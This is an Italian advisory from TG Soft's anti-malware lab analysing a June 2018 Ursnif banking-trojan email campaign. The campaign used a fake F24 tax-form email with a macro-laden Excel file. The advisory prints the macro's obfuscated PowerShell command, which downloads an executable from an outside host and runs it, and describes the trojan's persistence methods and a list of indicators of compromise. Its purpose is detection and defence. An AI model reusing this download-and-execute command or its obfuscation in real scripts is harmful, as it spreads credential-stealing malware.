Analisi da parte del C.R.A.M. (Centro di Ricerca Anti-Malware) di TG Soft della campagna di mail che diffonde il Trojan bancario Ursnif in data 27 Giugno 2018
Per gli invii massivi di mail fraudolente, vengono utilizzati i metodi di " ingegneria sociale" che sono sviluppati da persone/cyber-criminali per indurre la vittima ad aprire gli allegati infetti oppure a cliccare sui link presenti nel corpo del messaggio.
Se hai ricevuto un email sospetta, inviala al C.R.A.M. (Centro di Ricerca Anti-Malware): Come inviare mail sospette |
INDICE
|
Campagna malware "URSNIF"
Nome: Trojan.Win32.Ursnif
Famiglia malware: Banker
VirIT: X97M.Downloader.BM, Trojan.Win32.Downloader.RLJ, Trojan.Win32.Ursnif.HI
Descrizione:
La campagna di mail è partita questa mattina in data 27 Giugno 2018
Esempio di email riscontrate:
|
Oggetto: ricevute F24
|
Buongiorno,
ti allego f24
Cordiali saluti
|
 |
| |
Come si diffonde:
La mail si presenta come un invio di modello F24 con allegato un file di Excel malevolo.
L'allegato, al suo interno, contiene una MACRO che se avviata, procede all'immediata esecuzione di un comando CMD.exe che avvierà il download del malware (Trojan.Win32.Downloader.RLJ) tramite il programma Powershell.exe di Windows.
POwerSHeLL -nolO -exEcu bypAss -nONI -nOprOFi - wiNd HiDDeN
"$7d0mK6 = [TyPE](\"{1}{0}{3}{2}\" -f 'on','ENVIr','Nt','mE') ;
do{&(\"{1}{0}\" -f'ep','sle') 33;${D`es} = $7d0mk6::geTFolDeRPAtH(\"Desktop\");(&(\"{0}{1}{2}\" -f'Ne','w-','Object') (\"{0}{2}{1}{3}{5}{6}{4}\"-f'Sy','te','s','m.Ne','ent','t.Web','CLi')).dOwNloADfILE.inVOKE
(\"http://cloudphotos[.]party/fogliodati\",\"$Des\6576890.exe\")}
while(!${?});&(\"{0}{2}{3}{1}\"-f 'St','ocess','art','-Pr') $Des\6576890.exe |
Il file viene quindi scaricato nel Desktop dell'utente e poi eseguito. Una volta attivo si copierà nella cartella %appdata%\Microsoft\Windows\[CARTELLA CASUALE]\
Esempio di cartella: %appdata%\Microsoft\Windows\ucbaigjt\ con nome file cvbesvse.exe
Il file XLS analizzato scarica il malware dal seguente sito:
- http://cloudphotos[.]party/fogliodati
Nome File: cvbesvse.exe
Dimensione: 192000 byte
MD5: 856A792E418146BBF302A5AC9AB69FB7
Il Trojan.Win32.Downloader.RLJ (cvbesvse.exe) dopo essersi avviato e copiato nella cartella indicata precedentemente (%appdata%\Microsoft\Windows\ucbaigjt) crea un collegamento al file eseguibile in
C:\Users\[Utente]\AppData\Roaming\Microsoft\
Windows\Start Menu\Programs\Startup
con il nome ucbaigjt.lnk
Questo permetterà al malware di riavviarsi ogni volta che verrà effettuato il login dell'utente.
In aggiunta viene creato un TASK in "C:\Windows\system32\tasks\" con il nome "Opera scheduled Autoupdate 355159213" che prevede l'esecuzione del malware ogni 10 minuti, così facendo il Downloader ritorna attivo nel computer della vittima anche nel caso dovesse esser chiuso.
A questo punto il Trojan.Win32.Downloader.RLJ scarica il payload dell'Ursnif dal sito http://cloudmegavideo[.]bid nella cartella temporanea dell'utente con nome casuale in questo caso il file si chiama "EDCD.tmp.exe" e provvede poi ad avviarlo.
L'Ursnif appena avviato si va a copiare poi nella cartella: %appdata%\Microsoft\[CARTELLA CASUALE]\ con nome file casuale.
In questo caso la cartella è: %AppData%\Microsoft\Batmredm\ con nome file Appxnapi.exe
Nome File: Appxnapi.exe
Dimensione: 512512 byte
MD5: 0F499E0BB20EAEE792ED05B85D4A35C7
Il Trojan.Win32.Ursnif.HI si mette poi in esecuzione automatica modificando la seguente chiave di registro:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[CASUALE] = %AppData%\Microsoft\[CARTELLA CASUALE]\[NOME CASUALE].exe
Nel caso analizzato:
[AxInASDS] = %AppData%\Microsoft\Batmredm\Appxnapi.exe
Il Trojan.Win32.Ursnif fa parte della macrofamiglia dei Banker,
le sue peculiarità sono quelle di carpire password di accesso a siti importanti come possono essere home banking, posta elettronica, ftp etc.
IOC:
MD5:
8F80EC0EAD35359225A0102D28D851F9
856A792E418146BBF302A5AC9AB69FB7
0F499E0BB20EAEE792ED05B85D4A35C7
9F040EE0B7046F39C8A28459841DB2CC
F180DAE16B25BA8615D7C3BBFDEE1F6D
05BFBE6196B33A28314D87546876F953
URL:
http://cloudphotos[.]party/fogliodati
http://cloudmegavideo[.]bid
URL DGA (non ancora attivi):
http://fogmegavideo[.]win
http://cloudmegatape[.]date
http://cloudmegaaudio[.]faith
http://cloudmegacd[.]loan
http://cloudmegafilm[.]trade
http://hazemegavideo[.]bid
http://smokemegavideo[.]win
http://marmegavideo[.]date
http://skymegavideo[.]faith
http://cloudmegatv[.]loan
http://cloudmegamovie[.]trade
http://plumemegavideo[.]bid
http://showermegavideo[.]win
http://mistmegavideo[.]date
http://dimmegavideo[.]faith
http://cloudmegamusic[.]loan
http://cloudmegaclip[.]trade
http://snowmegavideo[.]bid
http://cloudmegadvd[.]win
http://cloudmegaad[.]date
http://rainmegavideo[.]faith
http://cloudmegabook[.]loan
http://fuelmegavideo[.]trade
http://dustmegavideo[.]bid
http://airmegavideo[.]win
http://windmegavideo[.]date
http://roilmegavideo[.]faith
http://hurtmegavideo[.]loan
http://cloudmegasong[.]trade
http://affectmegavideo[.]bid
http://taintmegavideo[.]win
http://cloudmegaphoto[.]date
Come cercare di riconoscere una falsa mail
L'esperienza ed il buon senso sono le prime armi per non rimanere vittima di questo tipo di truffe.
E' fondamentale un'
attenta lettura della mail, in tutti i suoi elementi. Diffidare da subito di allegati in formato
ZIP e, se possibile, NON abilitare l'esecuzione automatica delle
macro. E' fortemente sconsigliato impostare l'esecuzione automatica delle macro poichè la semplice apertura di file
Word ed
Excel vedrà l'immediata esecuzione delle macro senza alcun alert preventivo.
Nel caso in cui si fosse stati infettati da un
Banker, il consiglio da parte del
C.R.A.M. di
TG Soft è quello di prendere opportuni accorgimenti di sicurezza
anche dopo la bonifica del/dei sistemi coinvolti come il cambio delle password più comunemente utilizzate nel web.
Nel caso in cui la postazione coinvolta fosse stata utilizzata per operazioni di home-banking è consigliato anche un accertamento con il proprio
istituto di credito.
Come inviare e-mail sospette per l'analisi come possibili virus/malware/ransomware e/o tentativi di Phishing
L'invio di materiali da analizzare al Centro Ricerche Anti-Malware di TG Soft per l'analisi che è sempre e comunque gratuito può avvenire in tutta sicurezza in due modalità:
- qualsiasi e-mail che sia da considerarsi sospetta può essere inviata direttamente dalla posta elettronica del ricevente scegliendo come modalità di invio "INOLTRA come ALLEGATO" e inserendo nell'oggetto "Possibile Phishing da verificare" piuttosto che "Possibile Malware da verificare" alla mail lite@virit.com
- salvare come file esterno al programma di posta elettronica utilizzato la mail da inviare al C.R.A.M. di TG Soft per l'analisi . Il file che ne risulterà dovrà essere inviato facendone l'Upload dalla pagina di INVIO File Sospetti (http://www.tgsoft.it/italy/file_sospetti.asp). Naturalmente per avere un feed-back rispetto al responso dell'analisi dei file infetti inviati sarà necessario indicare un indirizzo e-mail e sarà gradita una breve descrizione del motivo dell'invio del file (ad esempio: possibile/probabile phishing; possibile/probabile malware o altro).
Tutto questo per aiutare ad aiutarvi cercando di evitare che possiate incappare in furti di credenziali, virus/malware o ancor peggio Ransomware / Crypto-Malware di nuova generazione.
Integra la protezione del tuo PC/SERVER con Vir.IT eXplorer Lite
Se non doveste ancora utilizzare Vir.IT eXplorer PRO è consigliabile installare, ad integrazione dell'antivirus in uso per aumentare la sicurezza dei vostri computer, PC e SERVER indifferentemente, Vir.IT eXplorer Lite -FREE Edition-.
Vir.IT eXplorer Lite ha le seguenti caratteristiche peculiari: |
 |
- liberamente utilizzabile sia in ambito privato sia in ambito aziendale con aggiornamenti Motore+Firme senza limitazioni temporali;
- interoperabile con eventuali altri AntiVirus, AntiSpyware, AntiMalware o Internet Security già presenti su PC e SERVER, consigliato l'utilizzo ad integrazione dell'AntiVirus già in uso poichè non conflitta nè rallenta il sistema ma permette di aumentare sensibilmente la sicurezza in termini di identificazione e bonifica dei file infetti;
- identifica e, in moltissimi casi, anche rimuove la maggior parte dei virus/malware realmente circolanti o, in alternativa, ne permette l'invio al C.R.A.M. Centro Ricerche Anti-Malware di TG Soft per l'analisi e l'aggiornamento di Vir.IT eXplorer per l'univoca identificazione e la corretta rimozione;
- grazie alla tecnologia Intrusione Detection, resa disponibile anche nella versione Lite di Vir.IT eXplorer, il software è in grado di segnalare eventuali virus/malware di nuova generazione che si siano posti in esecuzione automatica e procedere all'invio dei file segnalati al C.R.A.M. di TG Soft.
- Procedi al download di Vir.IT eXplorer Lite dalla pagina ufficiale di distribuzione del sito di TG Soft.
Per i licenziatari in assistenza della versione PRO di Vir.IT eXplorer...
 |
Per i possessori di Vir.IT eXplorer PRO è anche possibile contattare gratuitamente il supporto tecnico telefonico di TG Soft le cui modalità sono consultabili alla pagina del supporto CLIENTI. |
C.R.A.M.
Centro Ricerche Anti-Malware di
TG Soft
Torna ad inizio pagina
